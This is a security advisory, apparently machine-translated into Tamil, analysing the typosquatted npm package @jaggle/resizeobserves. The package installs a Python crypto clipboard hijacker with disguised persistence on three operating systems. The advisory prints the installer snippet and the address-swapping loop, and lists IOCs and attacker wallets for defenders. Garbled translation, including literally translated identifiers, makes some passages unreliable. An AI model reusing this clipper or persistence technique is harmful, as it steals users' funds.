டிஎல்; DR
2026-05-21 அன்று, npm பப்ளிஷர் jaggle ஒன்பது பதிப்புகளை வெளியிட்டது (1.0.0 மூலம் 1.0.8) @jaggle/resizeobserves தோராயமாக இரண்டு மணி நேர கால அவகாசத்தில்.
இந்தத் தொகுப்பு, முறையானதின் எழுத்துப்பிழைத் தவறாகும். @juggle/resize-observer பாலிஃபில் என்பது வாரந்தோறும் மில்லியன் கணக்கான பதிவிறக்கங்களைக் கொண்ட, பரவலாகப் பயன்படுத்தப்படும் ஒரு தொகுப்பு ஆகும், ஆனால் அது உண்மையான ResizeObserver செயலாக்கத்தை வழங்கவில்லை.
மாறாக, தொகுப்பின் போஸ்ட்இன்ஸ்டால் ஹூக் ஒரு தொகுக்கப்பட்ட பைதான் பேலோடை நிறுவி, ஒரு இயங்குதள-இயல்புடைய தோற்றமுடைய ரன்டைம் புரோக்கராக பெர்சிஸ்டன்ஸைப் பதிவுசெய்து, கிரிப்டோகரன்சி பரிவர்த்தனைகளைக் குறிவைக்கும் ஒரு பல-இயங்குதள கிளிப்போர்டு ஹைஜாக்கரைச் செயல்படுத்துகிறது.
லினக்ஸ் நிலைத்தன்மை பின்வருமாறு தோன்றுகிறது python3-dbus-helper, MacOS as com.apple.python.runtime, மற்றும் விண்டோஸ் as PyRuntimeBroker.
பேலோட், வாலட் முகவரிகளுக்காக கிளிப்போர்டை தொடர்ந்து கண்காணித்து வருகிறது. 40க்கும் மேற்பட்ட பிளாக்செயின்கள் மேலும், நகலெடுக்கப்பட்ட முகவரிகளுக்குப் பதிலாக, தாக்குபவரால் கட்டுப்படுத்தப்படும் வாலெட்டுகளை அமைதியாக மாற்றுகிறது.
இந்த மால்வேர், எந்தவொரு வெளிச்செல்லும் C2 உள்கட்டமைப்பும் இன்றி முற்றிலும் உள்ளூரிலேயே செயல்படுவதால், கிளிப்போர்டு மாற்றீடே தரவைத் தரவு கசிவுக்கான வழிமுறையாக அமைகிறது.
முதன்மை IOC என்பது தொகுப்பின் பெயரே ஆகும்: @jaggle/resizeobserves — “jaggle” என்பதில் விடுபட்ட உயிரெழுத்தையும், “resizeobserves” என்பதில் சேர்க்கப்பட்ட “s” எழுத்தையும் கவனிக்கவும்.
தீவிரம்: அதிகம்.
தாக்குதல்: அது எவ்வாறு செயல்படுகிறது
npm:@jaggle/resizeobserves சாதாரணமாகப் பார்க்கும்போது இது தீம்பொருள் போலத் தெரியவில்லை. npm பார்வை. அதன் README.md இதன் வார்த்தைக்கு வார்த்தையான README ஆகும் npm:@juggle/resize-observer — அதே குறியீடு மாதிரிகள், அதே பயன்பாட்டு வழிமுறைகள், அதே import { ResizeObserver } from '@juggle/resize-observer' முழுவதும் மேற்கோள்கள் உள்ளன. கருத்துத் திருட்டு எந்த அளவுக்கு முழுமையாக உள்ளது என்றால், இந்த ஆவணங்களை மேலோட்டமாகப் பார்ப்பவர் எவரும், தாங்கள் உண்மையான மென்பொருளின் ஆவணங்களைப் படிக்கிறோம் என்றே கருதிவிடுவார்கள்.
தி தொகுப்பு.ஜேசன்இதற்கு மாறாக, அரிதாக உள்ளது: இல்லை களஞ்சியம் புலம், ஒரு ஒற்றை நான் நுழைவு சுட்டிக்காட்டுகிறது bin/clipboard-guardian.js, மற்றும் ஒரு நிறுவிய பின் இயங்கும் ஸ்கிரிப்ட் node npm-install.jsREADME-இல் உள்ள “அடிப்படைப் பயன்பாடு” எடுத்துக்காட்டுகள், tarball-இல் எங்கும் இல்லாத ஒரு ஜாவாஸ்கிரிப்ட் செயலாக்கத்தைக் குறிப்பிடுகின்றன. அந்தத் தொகுப்பில் உள்ள ஒரே ஜாவாஸ்கிரிப்ட், நிறுவல் ஸ்கிரிப்ட் மட்டுமே.
நிலை 1 — npm postinstall ஒரு பைதான் பேலோடைத் துவக்குகிறது.
npm-install.js இயங்குதளத்தைப் பற்றிய விழிப்புணர்வு கொண்டது. அது ஒரு இடத்தைக் கண்டறிகிறது. பிப் ஒரு நிலையான தேடல் பாதையில் இயக்கக்கூடியது (/usr/bin/pip3, /usr/local/bin/pip, பின்வாங்குதல் python3 -m pip), டார்பால் கோப்பகத்திலிருந்து தொகுக்கப்பட்ட பைதான் தொகுப்பை நிறுவுகிறது, மேலும் — லினக்ஸில் — உள்ளிழுக்கிறது. xclip or xsell வழியாக apt-get, Pacman, அல்லது DNF இரண்டும் ஏற்கனவே இல்லை என்றால்:
javascript if (PLATFORM === "linux" && !silent("which xclip") && !silent("which xsel")) { run("apt-get install -y xclip 2>/dev/null") || run("pacman -S --noconfirm xclip 2>/dev/null") || run("dnf install -y xclip 2>/dev/null"); } if ( !run(`${pip} install --quiet --upgrade --break-system-packages "${PKG_DIR}"`) && !run(`${pip} install --quiet --upgrade "${PKG_DIR}"`) ) process.exit(1); பயன்படுத்த –பிரேக்-சிஸ்டம்-பேக்கேஜ்கள் இது வேண்டுமென்றே செய்யப்பட்டது: நவீன லினக்ஸ் விநியோகங்கள், PEP 668-இன் வெளிப்புறமாக நிர்வகிக்கப்படும் சூழல் குறியீட்டை இயக்கியவாறே பைத்தானை வழங்குகின்றன, இது இயல்பாகவே தளம் தழுவிய pip நிறுவல்களைத் தடுக்கிறது. நிறுவல் ஸ்கிரிப்ட் அந்த நிறுவலைக் கட்டாயப்படுத்திச் செய்கிறது.
இந்த ஸ்கிரிப்ட் சூடோ-அறியும் திறன் கொண்டது. இயங்கும் uid ஒரு இன் விளைவாக இருக்கும்போது sudo npm install, அந்த ஸ்கிரிப்ட் கூறுகிறது SUDO_USER மற்றும் பணயங்களை வெளியே அனுப்புகிறது getent passwd கண்டுபிடிக்க உண்மையான பயனரின் முகப்பு அடைவில் எழுதி, பின்னர் அதன் நிலைத்தன்மை கோப்புகளை அதற்குப் பதிலாக அங்கே எழுதுகிறது. / ரூட்நிலைத்தன்மை என்பது பயனர் வாரியானது, அமைப்பு முழுமைக்குமானது அல்ல.
நிலை 2 — இயக்க நேரத் தரகர் பெயர்களின் கீழ் இயங்குதளங்களுக்கிடையேயான நிலைத்தன்மை
பைதான் தொகுப்பு நிறுவப்பட்ட பிறகு, அந்த ஸ்கிரிப்ட் ஒவ்வொரு இயக்க முறைமையிலும் ஒரு வெவ்வேறு பெயரில் தானியங்கு தொடக்கப் பதிவை உருவாக்குகிறது:
- லினக்ஸ் — ஒரு systemd பயனர் அலகு ~/.config/systemd/user/python3-dbus-helper.serviceஅந்த அலகின்
விளக்கம்
is பைதான் டி-பஸ் இயக்க நேர உதவியாளர்அந்த ஸ்கிரிப்ட் இதன் வழியாகவும் அதை இயக்க முயற்சிக்கிறது. systemctl –user enableகீழ் ஒரு கைமுறை சிம்லிங்கிற்குத் திரும்புதல் இயல்புநிலை.இலக்கு.விரும்புகிறது/ systemctl செயலிழக்கும்போது. sudo-வின் கீழ் இயங்கினால், ஸ்கிரிப்ட் இதற்கு மாறுகிறது. சூடோ -யு systemctl –user, உடன் XDG_RUNTIME_DIR பயனர்-பஸ் அழைப்பு செயல்படுமாறு அமைக்கவும்.
- MacOS — ஒரு LaunchAgent plist இல் ~/Library/LaunchAgents/com.apple.python.runtime.plist உடன் RunAtLoad=true மற்றும் KeepAlive=trueபின்னர் இதன் வழியாக ஏற்றப்பட்டது launchctl load.
- விண்டோஸ் — PyRuntimeBroker என்ற பெயரிடப்பட்ட ஒரு திட்டமிடப்பட்ட பணி, AtLogOn நேரத்தில் தூண்டப்பட்டு, பூஜ்ஜிய இயக்க நேர வரம்புடன் (அதாவது, காலக்கெடு இல்லாமல்), பவர்ஷெல் வழியாகப் பதிவுசெய்யப்பட்டது.
மூன்று பெயர்களுமே மேலோட்டமாகப் பார்க்கும்போது நம்பகமானவையாகத் தெரிகின்றன. python3-dbus-helper லினக்ஸ் டெஸ்க்டாப்களில் முறையான பைதான்-டி-பஸ் ஒருங்கிணைப்பின் பெயரிடும் மரபைப் பின்பற்றுகிறது. com.apple.python.runtime ஆப்பிளின் சொந்த சேவைகளுக்கான ரிவர்ஸ்-டிஎன்எஸ் லேபிளிங்கைப் பின்பற்றுகிறது. பைரன்டைம்ப்ரோக்கர் விண்டோஸின் எதிரொலிகள் RuntimeBroker.exe — UWP செயலிகளுக்கான அனுமதி கோரிக்கைகளுக்கு இடைத்தரகராகச் செயல்படும் ஒரு உண்மையான, கையொப்பமிடப்பட்ட மைக்ரோசாஃப்ட் சேவை. இந்தச் சூழலில் இவை எதுவும் உண்மையான ஆப்பிள்/மைக்ரோசாஃப்ட்/பைதான் சேவைகள் அல்ல, ஆனால் ஒரு பாதுகாவலர் விரைவாகப் பார்வை மூலம் ஆய்வு செய்யும்போது... systemctl –user list-units or கெட்-திட்டமிட்ட பணி பின்வாங்க வாய்ப்பில்லை.
நிலை 3 — கிளிப்போர்டு கடத்தல்காரர்
பைதான் பேலோட், நிறுவப்பட்டது clipboard_guardian/guardian.pyஇது, ஒவ்வொரு 400 மில்லி வினாடிக்கும் கணினி கிளிப்போர்டை ஆய்வு செய்யும் ஒரு முடிவற்ற சுழற்சியை இயக்குகிறது. ஒவ்வொரு சுழற்சியின் போதும், இது தற்போதைய கிளிப்போர்டின் உள்ளடக்கங்களை இதன் வழியாகப் பெறுகிறது. pyperclip.paste() மேலும் இது, Ethereum, Bitcoin, Monero, Solana, TRON, TON, Ripple, Litecoin, Dogecoin, Polkadot, NEAR, Cosmos, Algorand, Stellar, Cardano, Bitcoin Cash, Dash, Zcash, Aptos, Sui, Tezos, MultiversX, Harmony, Terra, Injective, Osmosis, Kava, Celestia, Nano, Filecoin, Ronin, Ergo, DigiByte, Hedera, BNB Smart Chain மற்றும் இயல்புநிலை உள்ளமைவில் (default config) வெற்றுப் பகுதியாகக் குறிக்கப்பட்ட ஆனால் காலியாக உள்ள பல (Sei, IOTA, Kaspa, Flow, Nervos, Decred, Ravencoin) ஆகியவற்றின் வாலட்-முகவரி வடிவங்களை உள்ளடக்கிய, நாற்பதுக்கும் மேற்பட்ட முன்-தொகுக்கப்பட்ட ரெகுலர் எக்ஸ்பிரஷன்களின் பட்டியலுக்கு எதிராக அவற்றை இயக்குகிறது.
ஒரு பொருத்தம் ஏற்படும்போது, அந்த ஸ்கிரிப்ட் அந்தச் சங்கிலிக்கான தாக்குபவரின் முகவரியை இதிலிருந்து படிக்கிறது. ~/.config/clipboard-guardian/config.json (அல்லது அதன் இயங்குதள சமமானவற்றை) இயக்கி, மாற்றப்பட்ட உரையைக் கொண்டு கிளிப்போர்டை மேலெழுதும்:
python result = find_address_in_text(current, config) if result is None: time.sleep(POLL_INTERVAL) continue chain, found_addr = result my_addr = config[chain] if found_addr == my_addr: time.sleep(POLL_INTERVAL) continue new_text = replace_address_in_text(current, found_addr, my_addr) clipboard_set(new_text) நெட்வொர்க் பீக்கன் எதுவும் இல்லை. கிளிப்பர் அதன் மூல அலுவலகத்திற்குத் தகவல் அனுப்புவதில்லை, பாதிக்கப்பட்ட ஹோஸ்ட்களைப் பதிவு செய்வதில்லை, எதையும் வெளியேற்றுவதில்லை. அந்த வெளியேற்றமே பதிலீடுதான்: ஒரு பயனர் தனது வாலட் பயனர் இடைமுகத்திலிருந்து (UI) பெறுநர் முகவரியை நகலெடுத்து, அனுப்பும் உரையாடல் பெட்டியில் ஒட்டும்போது, ஒட்டப்பட்ட அந்த முகவரி இயக்குபவருக்குச் சொந்தமாகிறது. பயனருக்குத் தெரியாமல், நிதிகள் அதே வழியில் இழக்கப்படுகின்றன.
இங்கே புதிதாக என்ன இருக்கிறது?
பொதுவான கிரிப்டோ-கிளிப்பர் டெம்ப்ளேட்டுடன் ஒப்பிடும்போது சில விவரங்கள் தனித்து நிற்கின்றன:
1. npm → Python கலப்பு. npm-ல் நாம் காணும் பெரும்பாலான கிரிப்டோ-கிளிப்பர்கள் தூய ஜாவாஸ்கிரிப்ட் ஆகும், அவை பெரும்பாலும் வேறு சிலவற்றால் மறைக்கப்படுகின்றன. _0x வரிசை சுழற்சி அல்லது eval(atob(…)) இந்த மாதிரி, npm டார்பாலை ஒரு பைதான் தொகுப்பிற்கான விநியோக உறையாக மட்டுமே பயன்படுத்துகிறது — இது ஒரு தூய்மையான பைதான் தொகுப்பு — மேலும் சார்புநிலைகளின் நிறுவலை pip கையாள அனுமதிக்கிறது.பைப்பர்கிளிப், psutil, விருப்பமானது setproctitle) தொகுப்பில் அறிவிக்கப்பட்டது pyproject.tomlமுறியடிக்க வேண்டிய ஜாவாஸ்கிரிப்ட் மறைப்பு எதுவும் இல்லை. அந்த கிளிப்பர், தெளிவான, படிக்கக்கூடிய பைத்தான் ஆகும்.
2. நம்பகத்தன்மை கருதி ட்ரை-ஓஎஸ் நிலைத்தன்மை குறியீடுகள் தேர்ந்தெடுக்கப்பட்டன. பல குறுக்கு-தள நிறுவிகள் நிலைத்தன்மையை பொதுவான பெயர்களின் கீழ் பதிவு செய்கின்றன (புதுப்பிப்பான்.சேவை, helper.plistஇந்த மாதிரி, ஒவ்வொரு இயக்க முறைமையிலும் (OS) உள்ள இயங்குதளத்திற்கே உரிய ரன்டைம் புரோக்கர்களை ஒத்திருக்கும் லேபிள்களைத் தேர்ந்தெடுப்பதில் மெனக்கெடுகிறது. இந்தப் பெயரிடல் மட்டுமே ஒரு மறைமுக முயற்சியாகும் — இதில் ரூட்கிட் இல்லை, பயனர் பகுதியை மறைத்தல் இல்லை, பாதை தெளிவின்மை இல்லை. பாதுகாப்பாளர்கள் அரிதாகவே தணிக்கை செய்வார்கள் என்பதே இதன் அடிப்படை அனுமானம். ~/.config/systemd/user/ மற்றும் ஒரு சேவை பெயரிடப்பட்டது python3-dbus-helper மேலோட்டமான மதிப்பாய்வில் தனித்துத் தெரியாது.
3. செயல்முறைத் தலைப்பு மாறுவேடம் உண்மையானது, ஆனால் பகுப்பாய்வு எதிர்ப்பு செயலற்று இருக்கிறது. பைதான் பேலோட் வரையறுக்கிறது _disguise_process() செயல்முறை தலைப்பை இதன் மூலம் அமைக்கும் செயல்பாடு setproctitle (லினக்ஸ்/மேக்ஓஎஸ்) அல்லது SetConsoleTitleW (விண்டோஸ்) — மற்றும் முக்கிய () அதை அழைக்கிறது. அதனால் ps aux காண்பிக்கும் python3-dbus-helper அதற்கு பதிலாக python3 …/guardian.pyஇருப்பினும், அதே தொகுதி ஒரு வரையறுக்கிறது is_monitor_running() அறியப்பட்ட செயல்முறை கண்காணிப்புக் கருவிகளைப் பட்டியலிடும் செயல்பாடு (htop, பிடாப்டாஸ்க் மேனேஜர், ஆக்டிவிட்டி மானிட்டர், பிராசஸ் ஹேக்கர், ரிசோர்ஸ் மானிட்டர், GNOME / KDE / Xfce / MATE சிஸ்டம் மானிட்டர்கள், மற்றும் பல) — மற்றும் முக்கிய () அது ஒருபோதும் அதை அழைப்பதில்லை. பயனர் ஒரு செயல்முறை கண்காணிப்பானைத் திறந்து வைத்திருந்தாலும் இல்லாவிட்டாலும், பதிலீட்டுச் சுழற்சி நிபந்தனையின்றி இயங்குகிறது. வெளியிடப்பட்ட பதிப்பில் இந்தச் செயல்பாடு பயனற்ற குறியீடாக உள்ளது. இது பெரும்பாலும் முந்தைய பதிப்பின் மிச்சமாகவோ, அல்லது இன்னும் இணைக்கப்படாத ஒரு அம்சத்திற்கான கட்டமைப்பாகவோ இருக்கலாம். எப்படியாயினும், வெளியிடப்பட்ட தரவுப் பொதியின் பகுப்பாய்வுத் தடுப்புப் பரப்பு என்பது ஒரு செயல்முறைத் தலைப்புப் பெயர்மாற்றமே தவிர, செயல்திறன் மிக்க கண்காணிப்பானைத் தவிர்ப்பது அல்ல.
4. தொகுக்கப்பட்ட உள்ளமைவு-இணைப்புச் செயல்பாடு. npm-install.js இயல்புநிலை பணப்பை பட்டியலை எழுதுகிறது ~/.config/clipboard-guardian/config.json மேலும், ஒரு உள்ளமைவு கோப்பு ஏற்கனவே இருந்தால், தற்போதுள்ள மதிப்பு காலியாக உள்ள எந்த விசைகளையும் அது இணைத்துவிடும். அதாவது, முன்பு தொற்றுக்கு உள்ளாகி, உள்ளமைவை ஓரளவு சுத்தம் செய்த ஒரு பயனர் — உதாரணமாக, அதை காலி செய்வதன் மூலம் — ethereum மதிப்பு — ஒவ்வொரு அடுத்தடுத்த தீங்கிழைக்கும் தொகுப்பு நிறுவலின்போதும் இது மீண்டும் நிரப்பப்படும். எந்தக் குறியீட்டுப் பாதையிலும் இந்த நிலைத்தன்மைக் கோப்பு சுத்தப்படுத்தப்படுவதில்லை.
| தேதி / நேரம் (UTC) | நிகழ்வு |
|---|---|
2026-05-21 18:50:32 | @jaggle/resizeobserves@1.0.0 வெளியிடப்பட்டது. |
2026-05-21 19:55:55 | 1.0.1 வெளியிடப்பட்டது — முதல் பதிப்பு வெளிப்புற ஆய்வின் மூலம் கண்டறியப்பட்டது. |
2026-05-21 19:58:10 | 1.0.2 வெளியிடப்பட்டது. |
2026-05-21 20:05:03 | 1.0.3 வெளியிடப்பட்டது. |
2026-05-21 20:09:24 | 1.0.4 வெளியிடப்பட்டது. |
2026-05-21 20:13:48 | 1.0.5 வெளியிடப்பட்டது. |
2026-05-21 20:41:52 | 1.0.6 வெளியிடப்பட்டது. |
2026-05-21 20:43:56 | 1.0.7 வெளியிடப்பட்டது — ஒரு சேர்க்கிறது try/catch wallet-config எழுதும் படிநிலையைச் சுற்றியுள்ள உறை npm-install.js. |
2026-05-21 20:46:15 | 1.0.8 வெளியிடப்பட்டது — நிறுவியின் பெயர் மாற்றப்பட்டது npm-install.js → npm-install.cjs (பைட்-ஒத்த உள்ளடக்கம்). |
2026-05-22 | தீர்ப்புகளும் IOC-களும் வெளியிடப்பட்டன. வெளியிடும் நேரத்தில் பதிப்புகள் பதிவகத்தில் இன்னும் உள்ளன (தொடர்ந்து நடைபெறுகிறது). |
ஒரு மணி நேரம் ஐம்பத்தாறு நிமிடங்களில் ஒன்பது பதிப்புகள் என்பது, தட்டச்சுப் பிழை திருத்துபவருக்கே கூட வேகமானதுதான். இந்த முறை பின்வருவனவற்றுடன் ஒத்துப்போகிறது. வெளியிட்டு எரிக்கும் பிரச்சாரம் — பதிவகத்தை ஒரே ஹேண்டிலின் கீழ் நிரப்பி, கண்டறிதல் அதன் போக்கில் செல்ல அனுமதித்து, ஒரு பதிப்பு நீக்கப்பட்டவுடன் புதிய ஹேண்டிலுக்கு மாறவும். இந்தச் செயல்பாட்டின் போது தெரியும் வேறுபாடுகள் தோற்றரீதியானவை: 1.0.1 பதிப்பில் வெளிப்படையான மாற்றம் சேர்க்கப்பட்டது. /usr/bin/pip3pip தேடல் பட்டியலுக்கான -style பாதைகள் (sudo-இணக்கத்தன்மை), 1.0.7 பதிப்பு wallet-config எழுதும் செயல்பாட்டை ஒரு try/catch-க்குள் இணைத்தது, மற்றும் 1.0.8 பதிப்பு நிறுவியை இதிலிருந்து மறுபெயரிட்டது. .js க்கு .cjs அதன் உள்ளடக்கத்தை பைட்-ஒரே மாதிரியாக வைத்திருக்கும் அதே வேளையில். .cjs வெளிப்படையான அனுமதி இல்லாத தொகுப்புகளில் தெளிவற்ற தொகுதித் தீர்மானம் குறித்த npm எச்சரிக்கைகளுடன் டிராக்குகளை மறுபெயரிடுதல் "வகை" இது, கவனத்தை ஈர்க்கக்கூடிய நிறுவல் நேரக் குழப்பத்தை அடக்குவதற்கான ஒரு முயற்சியாக இருக்கலாம். உண்மையில் தரவைத் திருடும் ஒரே பகுதியான பைதான் பேலோட், ஒன்பது பதிப்புகளிலும் மாற்றமின்றி உள்ளது.
சமரசத்தின் குறிகாட்டிகள்
தொகுப்புகள்
| சூழல் | தொகுப்பு | பதிப்புகள் | நிலைமை |
|---|---|---|---|
| NPM | @jaggle/resizeobserves | 1.0.0 மூலம் 1.0.8 | வெளியீட்டின் போது நேரலையில் உள்ளது; நீக்கக் கோரப்பட்டுள்ளது. |
கோப்புகள் மற்றும் ஹாஷ்கள்
| பாதை | குறிப்புகள் |
|---|---|
clipboard_guardian/guardian.py(md5 f7935c2c82bc881288611ab6cd634f17) | வெளியிடப்பட்ட ஒன்பது பதிப்புகள் அனைத்திலும் ஒரே மாதிரியாக உள்ளது (1.0.0 மூலம் 1.0.8கிளிப்பர் பேலோட். |
npm-install.js (1.0.0 – 1.0.7)npm-install.cjs (1.0.8) | நிலைத்தன்மை நிறுவி; முழுமையான அதே செயல்பாடு. 1.0.7's .js மற்றும் 1.0.8's .cjs பைட் அளவில் ஒத்தவை. |
~/.config/clipboard-guardian/config.json | லினக்ஸ் நிலைத்தன்மை கட்டமைப்பு மற்றும் வாலட் தொகுப்பு. |
~/Library/Application Support/clipboard-guardian/config.json | macOS நிலைத்தன்மை கட்டமைப்பு மற்றும் வாலட் தொகுப்பு. |
%APPDATA%\clipboard-guardian\config.json | விண்டோஸ் நிலைத்தன்மை கட்டமைப்பு மற்றும் வாலட் தொகுப்பு. |
~/.config/systemd/user/python3-dbus-helper.service | லினக்ஸ் தானியங்கு தொடக்க நிலைத்தன்மை. |
~/Library/LaunchAgents/com.apple.python.runtime.plist | macOS LaunchAgent நிலைத்தன்மை. |
~/Library/Logs/com.apple.python.runtime.log | ஏஜென்ட்டிற்கான macOS stdout/stderr பதிவேடு. |
Scheduled Task PyRuntimeBroker | விண்டோஸ் தானாகத் தொடங்கும் பணி (AtLogOnகாலக்கெடு இல்லை). |
நடத்தை குறிகாட்டிகள்
| சிக்னல் | விளக்கம் |
|---|---|
pip install --break-system-packages npm postinstall இலிருந்து | PEP 668 பாதுகாப்புகளை மீறி, தளம் முழுவதும் பைத்தான் நிறுவலைக் கட்டாயப்படுத்துகிறது. |
apt-get install -y xclip (அல்லது பேக்மேன்/டிஎன்எஃப்) | லினக்ஸில் தொகுப்பு நிறுவலின் போது கிளிப்போர்டு பயன்பாடுகளை நிறுவுகிறது. |
python3-dbus-helper.service systemd பயனர் அலகு | நம்பகத்தன்மை வாய்ந்ததாகத் தோன்றும் ஒரு ரன்டைம்-ஹெல்பர் பெயரின் கீழ் நிலைத்தன்மை பதிவுசெய்யப்பட்டுள்ளது. |
com.apple.python.runtime துவக்க முகவர் | முறையான ஆப்பிள் சிஸ்டம் பாதைகளுக்கு வெளியே உள்ள நிலைத்தன்மை லேபிள். |
PyRuntimeBroker திட்டமிடப்பட்ட பணி | முறையான நிறுவி மூலம் இல்லாத போலி விண்டோஸ் ரன்டைம் புரோக்கர் நிலைத்தன்மை. |
பைதான் செயல்முறை python3-dbus-helper இறக்குமதி pyperclip மற்றும் psutil | காட்டப்படும் செயல்முறைப் பெயருக்கும் இறக்குமதி செய்யப்பட்ட நூலகங்களுக்கும் இடையே நடத்தை ரீதியான பொருந்தாமை. |
| வாலட் முகவரி நகலெடுக்கப்பட்ட சுமார் 0.4 விக்குப் பிறகு கிளிப்போர்டு மாறுகிறது. | கிரிப்டோகரன்சி முகவரி மாற்றீட்டின் கையொப்ப நடத்தை. |
தாக்குபவர் பணப்பைத் தொகுப்பு (பாதுகாப்பாளர் வேட்டைப் பட்டியல்)
வாலட் பட்டியல் நிரலில் நேரடியாகக் குறிப்பிடப்பட்டுள்ளது. npm-install.js மற்றும் clipboard_guardian/guardian.pyபாதுகாப்பாளர்கள் இந்தப் பட்டியலை ஒரு தடுப்புப் பட்டியலாகவும் (நிறுவன பணப்பைகளிலிருந்து இந்த முகவரிகளுக்கு செய்யப்படும் எந்தவொரு பரிமாற்றத்தையும் சந்தேகத்திற்குரியதாகக் கருதுதல்) மற்றும் ஒரு தேடல் திறவுகோலாகவும் (அங்கீகரிக்கப்படாத உள்ளமைவு கோப்பு, உருவாக்கக் கூறு அல்லது உருவாக்குநர் கணினியில் இந்தச் சரங்களில் ஏதேனும் ஒன்று இருப்பதை ஒரு தொற்று அறிகுறியாகக் கருதுதல்) பயன்படுத்தலாம்.
தாக்குதல் பணப்பை தொகுப்பு
| செயின் | முகவரி |
|---|---|
| எத்தேரியம் / பிஎஸ்சி | 0x450c0E58Fc2ba03632d3F5780ad8C966648B6F18 |
| ரோனின் (ஈவிஎம்) | ronin:450c0E58Fc2ba03632d3F5780ad8C966648B6F18 |
| Bitcoin | bc1qs2mpls4p0f7fng073gy2rcdgjpf7la4eugpt6y |
| Bitcoin Cash | bitcoincash:qqmvyxxklzp7l3eslxavhc8phl6hprdf25lwc29nlt |
| Litecoin | ltc1qnefc8x59a9cwtqnflt8hmqvezqw4hc7lt3fkqe |
| Dogecoin | DNEJmYRZtzyK44tZea4S7wV3otTyRk48Fy |
| சிறுகோடு | XtJ7E6mnhPK93Vib29PGQrTmQjhTTqFwbS |
| Zcash | t1d4hcEnBjdh9X6Wb6R2dxqjnxddJ6ocP8M |
| DigiByte | DPmH2dhiGK3hk3A69tZUMz6tHzGFHBzSrH |
| Monero | 42zhAidVhP7QETk83JAspS59ASALSHFio44vmu6MdDCz15cSqtqsG4QVyzY8vTrjGrTEA6zMbWW6Yft1Ynz1xLfCN5FVbXf |
| சோலானா | DWBAmQLi9gP6mk7UfJfQGYTV1UPK32WekLTqg83q1mc5 |
| ட்ரான் | TVgEgMemmJABYYnbNr1Wi8bSgADEkdEBt2 |
| TON | UQDTSkvwmptU9eG988KgxS3WjnYAZlXgfpJxnz4mhWZAvULr |
| Ripple | r9tj3cMCiqRijNYqNVYNuwKykkQfS8FE4H |
| polkadot | 1JSkYqXQE4d28HdcmTPhbgCrdiPFTfSHxD67tam16p53oBG |
| NEAR | 5d6aec44551529e8cd9ebd3aaa84b3832fc3c7463596b2b6e72635b80096a364 |
| காஸ்மோஸ் | cosmos1pzfl3kv5g8g0ernj86rwpar08u2zl9suthx28e |
| சவ்வூடுபரவல் | osmo1pzfl3kv5g8g0ernj86rwpar08u2zl9surv463t |
| செலஸ்டியா | celestia1pzfl3kv5g8g0ernj86rwpar08u2zl9su6ah6a5 |
| உள்நோக்கு | inj1g5xquk8u9wsrvvkn74uq4kxfvejgkmccn578gh |
| காவா | kava1kjfvgcz4q0y9yae2f3pa33vhj2estxxj3sqqux |
| ஹார்மனி | one19hn0n7dzkhtl9ta9ekv5592s85jwstpka76t3a |
| டெர்ரா | terra1h0dwu8z405jagdlr0fgr9jllac2sxajzlgme5x |
| Algorand | XSAMN3FTB5SUHUQFENBDDRXIMOPNFVLKAWA3RNOU54DWROMDZ6SR7DZ2PI |
| நட்சத்திர | GACNZSV4EQO65NZZUOBS3TMJM7GFTSRNKQBVJOX5P2G7U7SEBQ2ZUDJE |
| Cardano | addr1qyj050vla4cglmyrgm4vzf3dxtn0gynpks4t7vp7s3lg49e9wt0s94hcztzdgecxcz5hu9uk56q60yth6d66w026s2kq3ma56f |
| மல்டிவர்ஸ்எக்ஸ் | erd1slvlgqsmwzk0c8xtksm4eq5vdfnc26slpzqsyxhz456zvme5rpasue6ge0 |
| அப்டோஸ் | 0x580ecda1ebd6ca5a46be2097568d013308bd54ef1d147acb880b59f7709f280e |
| சூய் | 0xf7e8a9a970fa65c058745c4b2cf2a856cc0283863e4ed1e142648f26097b0c78 |
| நானோ | nano_393n56a5pfz8zg3nkzf7mytfgagzhu5mn9i3xiqg54weq8n1u8jgezxas7dn |
| Filecoin | f1fypyww3xubopfnv7q6yh5l4bko44wmfktf3ckui |
| Tezos | tz1RccjnorHk61bt73ArLXcdgFjEj6T1ochk |
| எனவே | 9g1pNQGnFg7Hk1d9Z66bgHMkguGU7R41btypAnbG1NF5FJoNdBA |
| தலைப்பு | 0.0.10488092 |
இயல்புநிலை உள்ளமைவில் ரெஜெக்ஸ் கவரேஜ் இருந்தும் காலியான வாலட் இடங்களைக் கொண்ட செயின்களான — Sei, IOTA, Kaspa, Flow, Nervos, Decred, Ravencoin, Beacon-Chain BNB — இந்த உருவாக்கத்தில் முனைப்புடன் பதிலீடு செய்யப்படுவதில்லை, ஆனால் கண்டறியப்படுகின்றன. அவற்றை பதிலீட்டு வரம்பாகக் கருதாமல், கண்காணிப்பு வரம்பாகக் கருதுங்கள்.
காரணம் மற்றும் உந்துதல்
இந்த பிரச்சாரம், குற்றம் சாட்டப்பட்டவரை அடையாளம் காண்பதற்கான வாய்ப்பைக் குறைக்கிறது. இயக்குபவரின் அடையாளத்தை எங்களால் உறுதிப்படுத்த முடியவில்லை. எங்களால் பதிவு செய்ய முடிந்தவை:
- பதிப்பாளர் மெட்டாடேட்டா. npm கணக்கு ஜாகில் அதன் மின்னஞ்சலை இவ்வாறு பட்டியலிடுகிறது olgascarlet@deltajohnsons.comடொமைன் டெல்டாஜான்சன்ஸ்.காம் எங்களால் சரிபார்க்கக்கூடிய ஒரு நிறுவன அடையாளமாக இது அமையவில்லை. npm கணக்கில் மின்னஞ்சல் சரிபார்ப்பு எதுவும் காட்டப்படவில்லை. SCM சரிபார்ப்பு. இது தொடர்பான பொதுவான கிட்ஹப் இருப்பு எதுவும் இல்லை.
- களஞ்சியப் புலம். தி தொகுப்பு.ஜேசன் இல்லை களஞ்சியம் புலம். சட்டபூர்வமான npm:@juggle/resize-observer ஆயிரக்கணக்கான நட்சத்திர மதிப்பீடுகளையும் செயலில் உள்ள சிக்கல்களையும் கொண்ட ஒரு உண்மையான GitHub களஞ்சியத்தை இது சுட்டிக்காட்டுகிறது. ஒரு களஞ்சிய இணைப்பு இல்லாததே, npm பயனர் இடைமுகத்தில் இதைக் காட்டிக்கொடுக்கும் மிக வேகமான ஒற்றை அறிகுறியாகும்.
